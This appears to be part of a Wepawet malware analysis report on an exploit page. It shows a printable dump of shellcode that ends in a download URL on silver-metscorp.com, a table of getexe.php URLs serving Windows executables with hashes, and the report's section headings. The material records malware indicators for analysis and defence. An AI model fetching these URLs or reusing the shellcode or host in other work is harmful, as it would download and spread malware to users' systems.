..3.d.@0x..@..p.
..X....@4.@|.X<j
NZ..+....E.n.ex.
E......E......OZ
R..V.U.VW.s<.t3x
..V.v ..3.IPA.3.
6....8.t......@.
.X;.u.^.F$..f..H
.V........_^P..}
.WR.3..[.....2..
...O.E..f.f.3..a
d..PhThre5$.itPT
S....|.U....P.l.
..Phon.dhurlmT..
N...U.....P3.PPV
.U..U.RP.6./p.U.
[.}........j.h..
..j.j.j.h....V..
..|.U..E.j.h....
h....j..T....U..
E.Pj..M.Qh....P.
u...e...U._.....
.M.........j.j.j
..u.....v.U.j..M
.Q.u..u...$..u..
.y...U..u.......
U..E.....WV.....
.U..*.*...w..E..
..P].g........Bv
..Tc.{....Ns.?..
}..t`.E......E.y
.ex.E.r....}..}.
.&....W.......|.
..3.....2...2.2.
2.............*.
*...*.*.........
GIu...http://sil
ver-metscorp.com
/1/getexe.php?sp
l=mem_cor.

Additional (potential) malware:

URL	Type	Hash	Analysis
http://silver-metscorp.com/1/getexe.php?spl=DirectX_DS	MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit	65406a70ba6ce0ddb31ef046fd75fbea	Anubis report Virustotal report
http://silver-metscorp.com/1/getexe.php?spl=Snapshot	MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit	65406a70ba6ce0ddb31ef046fd75fbea	Anubis report Virustotal report
http://silver-metscorp.com/1/getexe.php?spl=mem_cor	MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit	65406a70ba6ce0ddb31ef046fd75fbea	Anubis report Virustotal report

Wepawet (alpha)

Analysis report for http://silver-metscorp.com/1/index.php?spl=1

Sample Overview

Detection results

Exploits

Deobfuscation results

Evals

Writes

Network Activity

Requests

Redirects

ActiveX controls

Shellcode and Malware